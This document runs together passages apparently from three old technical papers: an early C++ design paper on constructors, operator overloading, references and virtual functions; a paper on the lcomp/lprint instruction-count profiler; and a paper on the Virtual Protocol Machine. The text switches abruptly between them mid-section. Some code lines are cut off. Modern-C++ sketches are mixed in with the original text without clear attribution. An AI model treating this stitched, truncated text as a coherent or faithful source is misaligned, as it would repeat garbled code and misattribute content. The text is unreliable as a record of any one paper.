The use of functions like set_date() to provide initialization for class objects is inelegant and error prone. Since it is nowhere stated that an object must be initialized, a programmer can forget to do so or, often with equally disastrous results, do so twice. A better approach is to allow the programmer to declare a function with the explicit purpose of initializing objects. Because such a function constructs values of a given type, it is called a constructor. A constructor is recognized by having the same name as the class itself. For example:

    class date {
        /* ... */
        date(int, int, int);
    };

When a class has a constructor, all objects of that class must be initialized:

    date today = date(23, 6, 1983);
    date xmas(25, 12, 0);    /* legal abbreviated form */
    date july4 = today;
    date my_birthday;        /* illegal, initializer missing */

It is often nice to provide several ways of initializing a class object. This can be done by providing several constructors.
For example:

    class date {
        /* ... */
        date(int, int, int);    /* day, month, year */
        date(char*);            /* date in string representation */
        date(int);              /* day, assume current month and year */
        date();                 /* default date: today */
    };

As long as the constructor functions differ in their argument types, the compiler can select the correct one for each use:

    date today(4);
    date july4("July 4, 1983");
    date guy("5 Nov");
    date now;                   /* default initialized */

Constructors are not restricted to initialization, but can be used wherever it is meaningful to have a class object:

    date us_date(int month, int day, int year)
    {
        return date(day, month, year);
    }

    some_function(us_date(12, 24, 1983));
    some_function(date(24, 12, 1983));

When several functions are declared with the same name, that name is said to be overloaded. The use of overloaded function names is not restricted to constructors. However, for nonmember functions the function declarations must be preceded by a declaration specifying that the name is to be overloaded; for example:

    overload print;
    void print(int);
    void print(char*);

or possibly abbreviated like this:

    overload void print(int), print(char*);

As far as the compiler is concerned, the only thing common to a set of functions of the same name is that name. Presumably they are in some sense similar, but the language does not constrain or aid the programmer. Thus, overloaded function names are primarily a notational convenience. This convenience is significant for functions with conventional names like sqrt, print, and open. Where a name is semantically significant, as in the case of constructors, this convenience becomes essential. For example, consider writing a single constructor for class date above. For arguments to functions with overloaded names the C type conversion rules do not apply fully.
The conversions that may destroy information are not performed, leaving only char->short->int->long, float->double, and int->double. It is, however, possible to provide different functions for integral and floating types. For example:

    overload print(int), print(double);

The list of functions for an overloaded name will be searched in order of appearance for a match, so that print(1) will invoke the integer print function, and print(1.0) the floating-point print function. Had the order of declaration been reversed, both calls would have invoked the floating-point print function with the double representation of 1.

VIII. OPERATOR OVERLOADING AND TYPE CONVERSION

Some languages provide a complex data type, so that programmers can use the mathematical notion of complex numbers directly. Since C does not, it is an obvious test of an abstraction facility to see to what extent the conventional notion of complex numbers can be supported. (Note, however, that complex is an unusual data type in that it has an extremely simple representation and there are very strong traditions for its proper use. It is, therefore, primarily a test of the abstraction facility's power to imitate conventional notation. In most other cases the designer's attention will be directed towards finding a good representation of the abstraction and towards finding a suitable way of presenting the abstraction to its users.) The aim of the exercise is to be able to write code like this:

    complex x;
    complex a = complex(1, 1.23);
    complex b = 1;
    complex c = PI;

    if (x != a) x = a + log(b*c)/2;

That is, the standard arithmetic and comparison operators must be defined for complex numbers and for mixtures of complex and scalar constants and variables.
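As a compilable preview in modern C++ syntax, such a complex type can be written and exercised as below. This is only a sketch of the paper's exercise (real programs would use the library type std::complex); the multiplication formula and operator!= are filled in here so the type can be tested:

```cpp
// Friend operator functions plus constructors that double as
// conversions from double, in the style developed in this section.
class complex {
    double re, im;
    friend complex operator+(complex, complex);
    friend complex operator*(complex, complex);
    friend int operator!=(complex, complex);
public:
    complex()                   { re = im = 0; }
    complex(double r)           { re = r; im = 0; }   // also a conversion
    complex(double r, double i) { re = r; im = i; }
};

complex operator+(complex a1, complex a2)
{
    return complex(a1.re + a2.re, a1.im + a2.im);
}

complex operator*(complex a1, complex a2)
{
    return complex(a1.re*a2.re - a1.im*a2.im,
                   a1.re*a2.im + a1.im*a2.re);
}

int operator!=(complex a1, complex a2)
{
    return a1.re != a2.re || a1.im != a2.im;
}
```

Because complex(double) exists, a mixed-mode expression such as x + 1 compiles by converting 1 to complex(1), the very mechanism discussed in the rest of this section.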
Here is a declaration of a very simple class complex:

    class complex {
        double re, im;
        friend complex operator+(complex, complex);
        friend complex operator*(complex, complex);
        friend int operator!=(complex, complex);
    public:
        complex()                   { re = im = 0; }
        complex(double r)           { re = r; im = 0; }
        complex(double r, double i) { re = r; im = i; }
    };

An operator is recognized as a function name when it is preceded by the key word operator. When an operator is used for a class type, the compiler will generate a call to the appropriate function, if declared. For example, for complex variables xx and yy the addition xx+yy will be interpreted as operator+(xx, yy), given the declaration of class complex above. The complex add function could be defined like this:

    complex operator+(complex a1, complex a2)
    {
        return complex(a1.re + a2.re, a1.im + a2.im);
    }

Naturally, all names of the form operator@ are overloaded. To ensure that the language is only extendable and not mutable, an operator function must take at least one class object argument. By declaring operator functions the programmer can assign meaning to the standard C operators applied to objects of user-specified data types. These operators retain their usual places in the C syntax, and it is not possible to add new operators. It is, therefore, not possible to change the precedence of an operator or to introduce a new operator (for example, ** for exponentiation). This restriction keeps the analysis of C expressions simple.

Declarations of functions for unary and binary operators are distinguished by their number of arguments. For example:

    class complex {
        /* ... */
        friend complex operator-(complex);             /* unary minus */
        friend complex operator-(complex, complex);    /* binary minus */
    };

There are three ways the designer of class complex could decide to handle mixed-mode arithmetic, like xx+i, where xx is a complex variable.
It can simply be considered illegal, so that the user has to write the conversion from double to complex explicitly: xx+complex(i). Alternatively, several complex add functions may be specified:

    complex operator+(complex, complex);
    complex operator+(complex, double);
    complex operator+(double, complex);

so that the compiler will choose the appropriate function for each call. Finally, if a class has constructors that take a single argument, then they will be taken to define conversions from their argument type to the type for which they construct values. Thus, with the declaration of class complex above, xx+1 would automatically be interpreted as operator+(xx, complex(1)).

This last alternative violates many people's idea of strong typing. However, using the second solution will nearly triple the number of functions needed, and the first provides little notational convenience to the user of class complex. Note that complex numbers are typical with respect to the desirability of mixed-mode arithmetic. A typical data type does not exist in a vacuum. Furthermore, for many types there exists a trivial mapping from the C numeric and/or string constants into a subset of the values of the type (similar to the mapping of the C numeric constants into the complex values on the real axis).

The friend approach was chosen in favor of using member functions for the operator functions. The inherent asymmetry in the notion of objects does not match the traditional mathematical view of complex numbers.

IX. DIGRESSION: DEFAULT ARGUMENTS AND INLINE FUNCTIONS

Class complex had three constructors, two of which simply provided the default value zero for notational convenience of the programmer. This use of overloading is typical for constructors, and has also been found to be quite common for other functions. However, overloading is a quite elaborate and indirect way of providing default argument values and, in particular for more complicated constructors, quite verbose.
Consequently, a facility for expressing default arguments directly is provided. For example:

    class complex {
        /* ... */
    public:
        complex(double r = 0, double i = 0) { re = r; im = i; }
    };

When a trailing argument is missing, the default constant expression is used. For example:

    complex a(1, 2);
    complex b(1);    /* b = complex(1, 0) */
    complex c;       /* c = complex(0, 0) */

When a member function, like complex above, is not only declared, but also defined (that is, its body is presented) in a class declaration, it may be inline substituted when called, thus eliminating the usual function call overhead. An inline substituted function is not a macro; its semantics are identical to other functions. Any function can be declared inline by preceding its definition by the key word inline. Inline functions can make class declarations quite untidy; they will only improve run-time efficiency if used judiciously, and will always increase the time and space needed to compile a program. They should therefore be used only when a significant improvement of run time is expected. They are included in C++ because of experience with C macros. Macros are sometimes essential for an application (and it is not possible to have a class member macro), but more often they create chaos by appearing to be functions without obeying the syntax, scope, and argument passing rules of functions.

X. STORAGE MANAGEMENT

There are three storage classes in C++: static, automatic (stack), and free (dynamic). Free store is managed by the programmer through the operators new and delete. No standard garbage collector is provided.† Constructors are handy for hiding details of free store management. For example:

    class string {
        char* rep;
        string(char*);
        ~string() { delete rep; }
    };

    string.string(char* p)
    {
        rep = new char[strlen(p)+1];
        strcpy(rep, p);
    }

Here the use of free store is encapsulated in the constructor string() and its inverse, the destructor ~string(). Destructors are implicitly called when an object goes out of scope. They are also called when an object is explicitly deleted by delete. For static objects destructors are called after all parts of the program as the program terminates. The new operator takes a type as its argument and returns a pointer to an object of that type; delete takes such a pointer as argument. A string may itself be allocated on the free store. For example:

    string* p = new string("asdf");
    delete p;
    p = new string("qwerty");

It is furthermore possible for a class to take over the free store management for its objects. For example:

    class node {
        int type;
        node* l;
        node* r;
        node()  { if (this == 0) this = new_node(); }
        ~node() { free_node(this); this = 0; }
    };

For an object created by new, the this pointer will be zero when a constructor is entered. If the constructor does not assign to this, the standard allocator function is used. The standard deallocator function will be used at the end of a destructor if and only if this is nonzero. An allocator provided by the programmer for a specific class or set of classes can be much simpler and at least an order of magnitude faster than the standard allocator. Using constructors and destructors, the designer may specify data types, like string above, where the size of the representation of an object can vary, even though the size of every static and automatic variable must be known at load time and compile time, respectively. The class object itself is of fixed size, but its class maintains a variable-sized secondary data structure.

† It is, however, not that difficult to write a garbage-collecting implementation of the new operator, as has been done for the old C free store allocator function malloc(). It is not in general possible to distinguish pointers from other data items when looking at the memory of a running C program, so a garbage collector must be conservative in its choice of what to delete, and it must examine unappealingly large amounts of data. They have been found useful for some applications, though.

XI. HIDING STORAGE MANAGEMENT

Constructors and destructors cannot completely hide storage management details from the user of a class. When an object is copied, either by explicit assignment or by passing it as a function argument, the pointers to secondary data structures are copied too. This is sometimes undesirable. Consider the problem of providing value semantics for a simple data type string. A user sees a string as a single object, but the implementation consists of two parts, as outlined above. After the assignment s1=s2 both strings refer to the same representation, and the store used for the old representation of s1 is unreferenced. To avoid this, the assignment operator can be overloaded:

    class string {
        char* rep;
        void operator=(string);
    };

    void string.operator=(string source)
    {
        if (rep != source.rep) {
            delete rep;
            rep = new char[strlen(source.rep)+1];
            strcpy(rep, source.rep);
        }
    }

Since the function needs to modify the target string, it is best written as a member function taking the source string as argument. The assignment s1=s2 will now be interpreted as s1.operator=(s2). This leaves the problem of what to do with initializers and function arguments. Consider

    string s1 = "asdf";
    string s2 = s1;
    do_something(s2);

This leaves the strings s1, s2, and the argument of do_something with the same rep. The standard bitwise copy clearly does not preserve the desired value semantics for strings.
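The full remedy the paper develops for this problem, a copy constructor taking a reference plus the overloaded assignment, can be sketched in modern C++. The accessor chars() is invented for testing, and the paper's "delete rep" becomes "delete[] rep" for an array in today's language:

```cpp
#include <cstring>

// A string that owns its free-store representation: constructor
// allocates, copy constructor and assignment duplicate, destructor
// frees. Each string therefore has value semantics.
class string {
    char* rep;
public:
    string(const char* p)
    {
        rep = new char[std::strlen(p) + 1];
        std::strcpy(rep, p);
    }
    string(const string& s)                 // copy, don't share
    {
        rep = new char[std::strlen(s.rep) + 1];
        std::strcpy(rep, s.rep);
    }
    string& operator=(const string& s)      // the paper's version returns void
    {
        if (this != &s) {
            delete[] rep;
            rep = new char[std::strlen(s.rep) + 1];
            std::strcpy(rep, s.rep);
        }
        return *this;
    }
    ~string() { delete[] rep; }
    const char* chars() const { return rep; }
};
```

After `string s2 = s1;`, s1 and s2 hold distinct representations, so deleting one cannot invalidate the other; this is exactly the value semantics the text is after.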
The semantics of argument passing and initialization are identical; both involve copying an object into an uninitialized variable. They differ from the semantics of assignment (only) in that an object assigned to is assumed to contain a value, and an object being initialized is not. In particular, constructors are used in argument passing exactly as in initialization. Consequently, the undesirable bitwise copy can be avoided if we can specify a constructor to perform the proper copy operation. Unfortunately, using the obvious constructor

    class string {
        string(string);
    };

leads to infinite recursion. It is therefore illegal. To solve this problem, a new type "reference" is introduced. It is syntactically identified by the declarator &, which is used in the same way as the pointer declarator *. When a variable is declared to be a T&, that is, a reference to T, it can be initialized either by a pointer to type T or by an object of type T. In the latter case the address-of operator & is implicitly applied. For example:

    int x;
    int& r1 = &x;
    int& r2 = x;

assigns the address of x to both r1 and r2. When used, a reference is implicitly dereferenced; so, for example:

    r1 = r2

means copy the object pointed to by r2 into the object pointed to by r1. Note that initialization of a reference is quite different from assignment to it. Using references, class string can now be declared like this:

    class string {
        char* rep;
        string(char*);
        string(string&);
        ~string();
        void operator=(string&);
    };

    string.string(string& source)
    {
        rep = new char[strlen(source.rep)+1];
        strcpy(rep, source.rep);
    }

Initialization of one string with another (and passing a string as an argument) will now involve a call of the constructor string(string&) that will correctly duplicate the representation. The string assignment operator was redeclared to take advantage of references. For example:

    void string.operator=(string& source)
    {
        if (this != &source) {
            delete rep;
            rep = new char[strlen(source.rep)+1];
            strcpy(rep, source.rep);
        }
    }

This type string will not be efficient enough for many applications. It is, however, not difficult to modify it so that the representation is only copied when necessary and shared otherwise.

XII. FURTHER NOTATIONAL CONVENIENCE

It is curious that references, a facility with great similarity to the "call by reference" rules for argument passing in many languages, are introduced primarily to enable a programmer to specify "call by value" semantics for argument passing. They have several other uses as well, however, including of course "by reference" argument passing. In particular, references provide a way of having nontrivial expressions on the left-hand side of assignments. Consider a string type with a substring operator:

    class string {
        /* ... */
        void operator=(string&);
        void operator=(char*);
        string& operator()(int pos, int length);
    };

where operator() denotes function application. For example:

    string s1 = "asdf";
    string s2 = "ghjkl";

    s1(1, 2) = "xyz";    /* s1 = "axyzf" */
    s2 = s1(0, 3);       /* s2 = "axy" */

The two assignments will be interpreted as:

    (s1.operator()(1, 2))->operator=("xyz");
    s2.operator=(s1.operator()(0, 3));

The operator() function need not know whether it is invoked on the left-hand or the right-hand side of the assignment. The operator= function can take care of that. Vector element selection can be similarly overloaded by defining operator[].

XIII. DIGRESSION: REFERENCES AND TYPE CONVERSION

Conversions defined for a class are applied even when references are involved.
Consider a class string where assignment of simple character strings is not defined, but the construction of a string from such a character string is:

    class string {
        /* ... */
        string(char*);
        void operator=(string&);
    };

    string s = "asdf";

The assignment

    s = "ghjk";

is legal, and will produce the desired effect. It is interpreted as

    s.operator=((temp.string("ghjk"), &temp))

where temp is a temporary variable of type string. Applying constructors before taking the address as required by the reference semantics ensures that the expressive power provided by constructors is not lost for variables of reference type. In other words, the set of values accepted by a function expecting an argument of type T is the same as that accepted by a function expecting a T& (reference to T).

XIV. DERIVED CLASSES

Consider writing a system for managing geometric shapes on a terminal screen. An attractive approach is to treat each shape as an object that can be requested to perform certain actions like "rotate" and "change color". Each object will interpret such requests in accordance with its type. For example, the algorithm for rotation is likely to be different (simpler) for a circle than for a triangle. What is needed is a single interface to a variety of co-existing implementations. The different kinds of shapes cannot be assumed to have similar representations. They may differ widely in complexity, and it would be a pity to be unable to utilize the inherent simplicity of basic shapes like circle and triangle because of the need to support complex shapes like "mouse" and "British Isles". The general approach is to provide a class shape defining the common properties of shapes, in particular a "standard interface".
For example:

	class shape {
		point	center;
		int	color;
		shape*	next;
		static shape* shape_chain;
	public:
		void move(point to) { center = to; draw(); }
		point where() { return center; }
		virtual void rotate(int);
		virtual void draw();
	};

The functions that cannot be implemented without knowledge of the specific shape are declared virtual. A virtual function is expected to be defined later. At this stage only its type is known; this, however, is sufficient to check calls to it. A class defining a particular shape may be defined like this:

	class circle : public shape {
		float radius;
	public:
		void rotate(int angle) {}
		void draw();
	};

This specifies a circle to be a shape, and as such it has all the members of class shape in addition to its own members. Objects of class circle can now be declared and used:

	circle c1;
	shape* sh;
	point p(100, 30);

	c1.draw();
	c1.move(p);
	sh = &c1;
	sh->draw();

Naturally, the function called by c1.draw() is circle::draw(), and since circle did not define its own move(), the function called by c1.move(p) is shape::move(), which class circle inherited from class shape. However, the function called by sh->draw() is also circle::draw(), despite the fact that no reference to class circle is found in the declaration of class shape. A virtual function can be redefined in a class derived from the class that declared it. Each object of a class with virtual functions contains a type indicator. This enables the compiler to find the proper virtual function for a call even when the type of the object is not known at compile time. Calling a virtual function is the only way of using the hidden type indicator in a class (a class without virtual functions does not have such an indicator). A shape may also provide facilities that cannot be used unless the programmer knows its particular type.
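The dispatch just described, where sh->draw() selects circle::draw() at run time, can be checked with a small compilable sketch. The int return values are tags invented here purely so the selection is observable; everything else follows the shape/circle outline above.

```cpp
#include <cassert>

// Sketch of the article's shape/circle hierarchy: draw() is virtual,
// so a call through a shape* selects the derived function at run time.
struct point {
    int x, y;
    point(int xx, int yy) : x(xx), y(yy) {}
};

class shape {
    point center;
public:
    shape() : center(0, 0) {}
    void move(point to) { center = to; }   // inherited by every shape
    point where() { return center; }
    virtual int draw() { return 0; }       // overridden per shape
    virtual ~shape() {}
};

class circle : public shape {
    float radius;
public:
    int draw() { return 1; }               // circle-specific draw()
};
```

Calling draw() through a shape* that points at a circle yields the circle tag, while move() and where() come unchanged from the base class.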
For example:

	class clock_face : public circle {
		line hour_hand, minute_hand;
	public:
		void draw();
		void rotate(int);
		void set(int, int);
		void advance(int);
	};

The time displayed by the clock can be set() to a particular time, and one can advance() the displayed time a number of minutes. The draw() in clock_face hides circle::draw(), so that the latter can only be called by its full name. For example:

	void clock_face::draw()
	{
		circle::draw();
		hour_hand.draw();
		minute_hand.draw();
	}

Note that a virtual function must be a member. It cannot be a friend, and there is no equivalent in the class/friend style of programming to the use of dynamic typing presented here and in the following section.

XV. DIGRESSION: STRUCTURES AND UNIONS

The C constructs struct and union are legal, but conceptually absorbed into classes. A struct is a class with all members public; that is,

	struct s { ... };

is equivalent to

	class s { public: ... };

A union is a struct that can hold exactly one data member at a time. These definitions imply that a struct or a union can have function members. In particular, they can have constructors. For example:

	union uu {
		int i;
		char* p;
		uu(int ii) { i = ii; }
		uu(char* pp) { p = pp; }
	};

This takes care of most problems concerning initialization of unions. For example:

	uu u1 = 1;
	uu u2 = "asdf";

XVI. POLYMORPHIC FUNCTIONS

By using derived classes, one can design interfaces providing uniform access to objects of unknown and/or different classes. This can be used to write polymorphic functions, that is, functions where the algorithm is specified so that it will apply to a set of different argument types. For example:

	void sort(common* v[], int size)
	{
		/* sort the vector of commons "v[size]" */
	}

The sort function need only be able to compare objects of class common to perform its task. So, if class common has a virtual function cmpr(), sort() will be able to sort vectors of objects of any class derived from class common for which cmpr() is defined.
For example:

	class common {
		virtual int cmpr(common*);
	};

	class apple : public common {
		int key;
		int cmpr(common* arg)
		{
			/* assume that arg is also an apple */
			int k = ((apple*)arg)->key;
			return (key == k) ? 0 : (key < k ? -1 : 1);
		}
	};

The user gets an executable program by typing lcomp max.c. After executing the program, the user types lprint, and gets the following output (the italic line numbers are not part of the output).

	1.	1	#define N 100000
	2.	1	int x[N];
	3.	1
	4.	1	main()
	5.	1	{	int i;
	6.	1		srand(getpid());
	7.	1		for (i = 0; i
	…
	17.			if (x[i] > x[j])
	18.	10			j = i;
	19.	99999	}
	20.	1		return (j);
	21.	0	}

INSTRUCTION COUNTING 237

The 10 new maxima are approximately what the theory predicts. The counts of 1 on the declarations and blank lines come from the next executable basic block (see Section 10.1). Thus, a blank line after line 17 would have a count of 99,999 in the output.

IX. PRINTING THE RESULTS

The program, lprint, prints counts. It produces output broken down by instruction, source line, function, or file. At its most verbose it will print each assembly-language instruction with the number of times it was executed. By default it prints each line of the source with the number of times it was executed, as above. Because the correspondence between basic blocks, which are what is actually counted, and source lines for compiled languages is inexact, these line counts need to be viewed with a modicum of understanding (see below). For intermediate amounts of detail, lprint summarizes by function, or prints each line with the number of machine instructions executed. Later there are some examples of line counts.
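The Section XVI scheme, a sort() that sees only the virtual cmpr() of class common, can be completed into a compilable sketch. The insertion-sort body is illustrative (the article leaves it out), and key is made public here only so results can be inspected.

```cpp
#include <cassert>

// Polymorphic sort in the article's style: sort() compares elements
// solely through the virtual cmpr() of the base class common.
class common {
public:
    virtual int cmpr(common*) = 0;   // <0, 0, >0, strcmp-style
    virtual ~common() {}
};

class apple : public common {
public:
    int key;
    apple(int k) : key(k) {}
    int cmpr(common* arg)
    {
        /* assume that arg is also an apple, as the article does */
        int k = ((apple*)arg)->key;
        return (key == k) ? 0 : (key < k ? -1 : 1);
    }
};

void sort(common* v[], int size)
{
    /* sort the vector of commons "v[size]" (illustrative insertion sort) */
    for (int i = 1; i < size; i++)
        for (int j = i; j > 0 && v[j-1]->cmpr(v[j]) > 0; j--) {
            common* t = v[j]; v[j] = v[j-1]; v[j-1] = t;
        }
}
```

Any class derived from common that defines cmpr() can be sorted by the same function, which is exactly the point of the section.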
Here is an example of summary by function:

	16779455 ie	524353 calls	38 i	0 ine	_naput
	99211687 ie	524353 calls	80 i	17 ine	_naget
	0 ie	0 calls	31 i	31 ine	_nafree
	3686 ie	67 calls	60 i	2 ine	_naupdat
	91478 ie	1434 calls	73 i	3 ine	_naread
	4779 ie	81 calls	69 i	10 ine	_nawrite
	420 ie	14 calls	31 i	1 ine	_natrunc
	30344908 ie	523189 calls	61 i	1 ine	_nastat
	457595 ie	1333 calls	368 i	80 ine	_nanamei
	72571404 ie	1576004 calls	107 i	11 ine	_send

The first column shows how many instructions were executed in that function. The second column gives the number of times the function was executed. The third gives the number of instructions in the compiled function, the fourth gives the number of those that were never executed, and the last column is the name of the function. The same data summarized by file are

	219465412 ie	9181 i	156 ine	60352487 bbe	255 bb	59 bbne	neta.c

The new information is in columns four, five, and six. These are the number of executions of basic blocks, the number of basic blocks in the file, and the number of those never entered during execution, respectively.

X. USING THE OUTPUT

10.1 But what does it really mean?

Here is an example. The italic numbers are not part of the program's output. The code is a piece of the operating system, and the data are real.

	1.	2204448	loop:
	2.	2204448		slot = INOHASH(dev, ino, fstyp);
	3.	2204448		ip = &inode[inohash[slot]];
	4.	4378850		while (ip != &inode[-1]) {
	5.	2919642			if (ino == ip->i_number && dev == ip->i_dev
	6.	2919642			    && fstyp == ip->i_fstyp) {
	7.	745240				if ((ip->i_flag&ILOCK) != 0) {
	8.	513					ip->i_flag |= IWANT;
	9.	513					sleep((caddr_t)ip, PINOD);
	10.	513					goto loop;
	11.	744727				}
	12.	744727				if ((ip->i_flag&IMOUNT) != 0) {
	13.	418411					for (mp = &mount[0]; mp < &mount[NMOUNT]; mp++)
	14.	4509270						if (mp->m_inodp == ip) {
	15.	418411							dev = mp->m_dev;
	16.	418411							ino = ROOTINO;
	17.	418411							fstyp = mp->m_fstyp;
	18.	418411							goto loop;
	19.	4090859						}
	20.	4090859					panic("no imt");
	21.	326316				}
	22.	326316				ip->i_count++;
	23.	326316				ip->i_flag |= ILOCK;
	24.	326316				return (ip);
	25.	2174402			}

Note that there are some peculiarities in the output. This is the case for the for statement at line 13, where the first basic block, the initialization, is executed 418,411 times, while the test is executed at least 4,509,270 times, as can be seen from the next line. Also, the C compiler (at least the one used for the example) has a slightly inaccurate count of line numbers, as we can see from the large numbers on statement 20, which actually was never executed. The problem here is that the C compiler did not recognize the end of the loop until it got to that line, so the loop increment code was associated with that line. Finally, the large count on line 25 is from the first line not shown, and represents the false branch of the test at line 5.

The problem with the compiler is that there is no exact correspondence between basic blocks and statements in C (or Fortran or Pascal). While this is regrettable, the data are not randomly weird, but systematically weird, and thus can usually be interpreted unambiguously. Adding curly braces frequently helps with compound statements. Also, the profiler's idea of lines is the same as the debugger's idea, so it would appear to the user, for instance, that the line after the loop is being executed each time the debugger single-steps through the loop.

This part of the kernel is profiled on purpose, not just for this paper. The loop at line 13 searches a linked list, and the question is whether the ordering of the items in the list should be changed, or whether some other data structure should be used. Since the list was searched 418,411 times using 4,509,270 comparisons, and since I know that the list is usually about 16 items long, it appears that some rearranging might make a slight difference.
As a side effect of the profiling, note that of the 745,240 times the test at line 7 was executed, 513 times the resource found was locked.

10.2 Bottlenecks

Time profiling determines which routines are taking lots of time. Then count profiling, by highlighting the busy parts, gives information that explains why the routines are taking so much time. Reference 4 gives examples in which count profiling led to a speedup by factors of 2 to 4.

10.3 Testing

The next example is the body of a routine to find the square root of the number a modulo a prime p. It was run several times on random data in the hope that all the code would be covered.

	1.	8	extern short primetab[];
	2.	8	modsqrt(a, p)
	3.	8	{	short *x;
	4.	8		int i, j, s, t, e, u;
	5.	8		a %= p;
	6.	8		if (a < 0)
	7.	0			a += p;
	8.	8		if (a == 0)
	9.	0			return (0);
	10.	8		if (p % 4 == 3)
	11.	5			return (mpow(a, (p+1)/4, p));
	12.	3		u = p - 1;
	13.	3		for (e = 0; (u&1) == 0; e++)
	14.	10			u >>= 1;
	15.	3		s = mpow(a, u, p);
	16.	3		if (s == 1)
	17.	0			return (mpow(a, (u+1)/2, p));
	18.	3		for (x = primetab + 1; legendre(*x, p) != -1;
	19.	5			x++);
	20.	3		for (j = 0; j < e; j++)
	21.	5			if (s == p-1)
	22.	3				break;
	23.	2			else
	24.	2				s = (s*s) % p;
	25.	3		s = mpow(*x, u, p);
	26.	3		for (i = 0; i
	…

	#define INCMOD8(Z)	{ Z++; if (Z >= 8) Z = Z - 8; }
	#define START_T1	{ tstatus |= T1FLAG; t1 = T1; }

	/*
	 * Transmit a data frame if one is available.
	 */
	xmtdata()
	{
		/*
		 * If this is not a retry, get a new frame if available.
		 */
		if (VS == unopened) {
			if (getxfrm(VS))
				return (FALSE);
			INCMOD8(unopened);
		}

		/*
		 * Set up address and control bytes.
		 */
		con = (VS&07) << 1;
		con |= (VR&07) << 5;
		ac[1] = con;
		ac[0] = faraddr;

		/*
		 * Start T1 timer if not currently running.
		 */
		if (!(tstatus & T1FLAG)) {
			START_T1;
		}

		/*
		 * Set up control information and transmit frame.
		 */
		setctl(ac, 2);
		xmtfrm(VS);
		INCMOD8(VS);
		return (TRUE);
	}

Fig. 3 — Example use of bit-oriented primitives.
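The INCMOD8 macro in Fig. 3 implements the wraparound of the send and receive state variables VS and VR: bit-oriented frame headers carry 3-bit sequence fields, so the counters count modulo 8. As a plain function it is:

```cpp
#include <cassert>

// Modulo-8 sequence-number increment, as used for HDLC-style
// 3-bit send/receive sequence counters (VS, VR in Fig. 3).
inline void incmod8(int& z)
{
    z++;
    if (z >= 8)
        z = z - 8;   // wrap: valid sequence numbers are 0..7
}
```

Starting from 7 the counter wraps back to 0, which is exactly what lets an unbounded stream of frames be numbered in a 3-bit field.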
Several primitives are available for use with all three classes of protocols. Among these are facilities for receiving commands from and sending reports to a UNIX system driver or user process, generating trace event records, and starting and resetting software timers. For a detailed description of the VPM primitives, see the entry for vpmc(1M) in the UNIX System Administrator's Manual. 3

III. COMMON SYNCHRONOUS INTERFACE

The UNIX operating system's Common Synchronous Interface (CSI) is a device-independent interface between a level-3 protocol executing as a part of the system and a level-2 protocol executing in a PCD. CSI allows level-3 protocol drivers to be independent of the host computers on which they run and the PCDs used to implement their level-2 protocol. Figure 1 illustrates the interaction of the level-3 protocol driver and the level-2 protocol through CSI. The interface consists of a set of functions used by level 3 and a set of reports that are generated by level 2. The two classes of functions are service functions and command functions. Service functions are used for buffer administration. Command functions are used to set up and communicate with the level-2 protocol. The level-3 driver receives reports from the level-2 protocol and the PCD device driver via an interrupt routine. The more important functions and reports are described below. Some nonessential functions and reports have been omitted for clarity.

VIRTUAL PROTOCOL MACHINE 279

Service functions provide standard buffer queue management for level-3 protocol drivers. A standard CSI buffer structure is used to maintain buffers, allowing machine-independent buffering. Each buffer structure has buffer descriptors associated with it for maintaining buffer addresses, sizes, and any machine-dependent information. The service functions include:

1. csialloc — Allocate a buffer area for use by the level-3 driver.
This function is typically called once during initialization to allocate buffer space for use by level 3.

2. csifree — Free the buffer area allocated for level 3.

3. csibget — Get a buffer descriptor and a buffer from the buffer area. This function is used by the level-3 protocol driver to obtain data buffers as needed.

4. csibrtn — Return a buffer descriptor and its associated buffer. This function is used when a buffer will no longer be needed by the level-3 protocol driver.

5. csicopy — Copy buffers to or from user space. This function provides a machine-independent way to copy data between system and user space.

Command functions are used to manage the communications link and communicate with the level-2 protocol script. The command functions include:

1. csiattach — Make a logical connection between a protocol driver and a synchronous line. This function is called before starting the level-2 protocol.

2. csidetach — Disconnect a protocol driver from a synchronous line.

3. csistart — Start the level-2 protocol. After a logical connection has been made, this function is used to start operation of the line (e.g., when a user requests a service).

4. csistop — Stop the level-2 protocol. This function is used to halt operation of the line.

5. csixmtq — Queue a transmit (full) buffer for level 2. This function is typically used by the level-3 protocol driver to transfer data on the line.

6. csiemptq — Queue a receive (empty) buffer for level 2. This function is used to provide level 2 with buffers for incoming data.

7. csiscmd — Send a command to the level-2 protocol. This function is typically used to communicate control information to level 2.

Reports are passed to a level-3 driver routine that is indicated when the logical connection is established. The level-3 driver receives two types of reports. Reports received as a result of a function call are referred to as solicited reports.
Reports that are not issued as a result of a function call are referred to as unsolicited reports. Solicited reports indicate the disposition of the corresponding function. The solicited reports include:

1. csistart — Issued in response to a start command from the csistart routine. The report indicates whether the line was started or if any errors occurred.

2. csistop — Issued in response to a stop command from the csistop routine. The report indicates that the level-2 protocol has been halted.

3. csirxbuf — Issued when the level-2 protocol program returns a transmit buffer to the level-3 protocol driver. This report typically indicates that the data have been transmitted.

4. csirrbuf — Issued when the level-2 protocol program returns a receive buffer to the level-3 protocol driver. The report typically indicates that data have been received.

5. csicmdack — Issued when the level-2 protocol receives a command from the csiscmd routine.

Unsolicited reports indicate asynchronous events from the level-2 protocol script. The unsolicited reports include:

1. csiterm — Occurs when the protocol terminates abnormally. The report contains an indication of the reason for termination.

2. csisrpt — Occurs when the level-2 protocol passes information to the protocol driver.

IV. TRACE DRIVER

The trace driver provides a means by which a user program can receive trace information generated by a VPM protocol driver and script to aid in debugging. It can also be used to debug other drivers or operating-system code that is not related to a VPM protocol driver or script. This driver can be configured to have a number of minor devices. Each trace-driver minor device provides a means by which a user program can read data that are generated by functions within the operating system. These data are recorded by issuing calls to the trsave function. Each call to trsave generates a unit of data known as an event record, which consists of a channel number, a count, and count bytes of data.
The channel number can be used to multiplex up to 16 data streams on each minor device. Each channel can be enabled or disabled by an ioctl system call. Event records that are generated for a minor device that is not currently open, or for a channel that is not currently enabled, are discarded. This allows a user program to control the activation and deactivation of tracing. Minor device 0 of the trace driver is used by the VPM transparent driver and CSI to record a variety of debugging information generated within these modules and also to record the data generated by trace primitives in the protocol script. Two commands, vpmsave and vpmfmt, are available for reading and formatting data passed via the minor devices of the trace driver. Trace information can be displayed in real time if appropriate.

V. IMPLEMENTATIONS

5.1 DEC computers

